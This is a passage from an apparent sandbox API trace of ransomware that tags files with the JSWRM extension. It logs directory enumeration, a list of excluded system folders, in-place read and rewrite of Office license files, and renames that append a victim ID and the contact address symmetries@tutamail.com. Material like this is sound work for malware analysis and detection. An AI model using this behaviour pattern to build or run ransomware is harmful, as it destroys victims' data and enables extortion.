lpDistanceToMoveHigh=0x0) returned 0x0 [0102.912] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5610, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5610, lpOverlapped=0x0) returned 1 [0102.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.913] CloseHandle (hObject=0x45c) returned 1 [0102.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0102.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0102.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0102.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0102.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0102.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0102.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.913] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_grace-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Grace-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_grace-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0102.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0102.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0102.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0102.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0102.914] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3b8a961, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3b8a961, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3c6f733, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d68, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_Grace-ul-oob.xrm-ms", cAlternateFileName="HOMEBU~2.XRM")) returned 1 [0102.914] lstrcmpiW (lpString1="HomeBusinessR_Grace-ul-oob.xrm-ms", lpString2=".") returned 1 [0102.914] lstrcmpiW (lpString1="HomeBusinessR_Grace-ul-oob.xrm-ms", lpString2="..") returned 1 [0102.914] lstrcmpiW (lpString1="HomeBusinessR_Grace-ul-oob.xrm-ms", lpString2="...") returned 1 [0102.914] lstrcmpiW (lpString1="HomeBusinessR_Grace-ul-oob.xrm-ms", lpString2="windows") returned -1 [0102.914] lstrcmpiW (lpString1="HomeBusinessR_Grace-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0102.914] lstrcmpiW (lpString1="HomeBusinessR_Grace-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0102.914] lstrcmpiW (lpString1="HomeBusinessR_Grace-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0102.915] lstrcmpiW (lpString1="HomeBusinessR_Grace-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.915] lstrcmpiW (lpString1="HomeBusinessR_Grace-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0102.915] lstrcmpiW (lpString1="HomeBusinessR_Grace-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0102.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0102.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Grace-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0102.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Grace-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22ce70, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0102.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0102.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0102.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Grace-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0102.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Grace-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0102.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0102.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0102.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0102.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0102.915] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_grace-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.915] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11624) returned 1 [0102.916] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0102.916] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0102.920] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.920] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0102.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.920] CloseHandle (hObject=0x45c) returned 1 [0102.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0102.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0102.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0102.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0102.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f280 [0102.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0102.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.921] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_grace-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Grace-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_grace-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0102.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0102.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0102.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.922] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3c494f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3c494f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3dc6c97, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x29a7, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_OEM_Perp-pl.xrm-ms", cAlternateFileName="HO936B~1.XRM")) returned 1 [0102.922] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-pl.xrm-ms", lpString2=".") returned 1 [0102.922] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-pl.xrm-ms", lpString2="..") returned 1 [0102.922] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-pl.xrm-ms", lpString2="...") returned 1 [0102.922] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-pl.xrm-ms", lpString2="windows") returned -1 [0102.922] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-pl.xrm-ms", lpString2="recovery") returned -1 [0102.922] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-pl.xrm-ms", lpString2="perflogs") returned -1 [0102.922] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-pl.xrm-ms", lpString2="documents and settings") returned 1 [0102.922] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.922] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-pl.xrm-ms", lpString2="system volume information") returned -1 [0102.922] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-pl.xrm-ms", lpString2="msocache") returned -1 [0102.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c2d0 [0102.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0102.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0102.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c2d0 | out: hHeap=0x1e0000) returned 1 [0102.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0102.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0102.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0102.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0102.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0102.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0102.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0102.922] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.923] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10663) returned 1 [0102.923] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x29a0) returned 0x24c1d0 [0102.923] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x29a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x29a0, lpOverlapped=0x0) returned 1 [0102.927] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.927] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x29a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x29a0, lpOverlapped=0x0) returned 1 [0102.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.927] CloseHandle (hObject=0x45c) returned 1 [0102.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0102.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0102.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0102.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0102.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0102.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0102.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0102.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0102.928] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0102.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0102.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0102.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.929] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3bd6df0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3bd6df0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3cbbc0c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x564d, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_OEM_Perp-ppd.xrm-ms", cAlternateFileName="HOMEBU~4.XRM")) returned 1 [0102.929] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ppd.xrm-ms", lpString2=".") returned 1 [0102.929] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ppd.xrm-ms", lpString2="..") returned 1 [0102.929] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ppd.xrm-ms", lpString2="...") returned 1 [0102.929] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ppd.xrm-ms", lpString2="windows") returned -1 [0102.929] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ppd.xrm-ms", lpString2="recovery") returned -1 [0102.929] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ppd.xrm-ms", lpString2="perflogs") returned -1 [0102.929] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0102.929] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.929] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ppd.xrm-ms", lpString2="system volume information") returned -1 [0102.929] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ppd.xrm-ms", lpString2="msocache") returned -1 [0102.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0102.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0102.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0102.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0102.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0102.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0102.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0102.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0102.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0102.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0102.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0102.929] 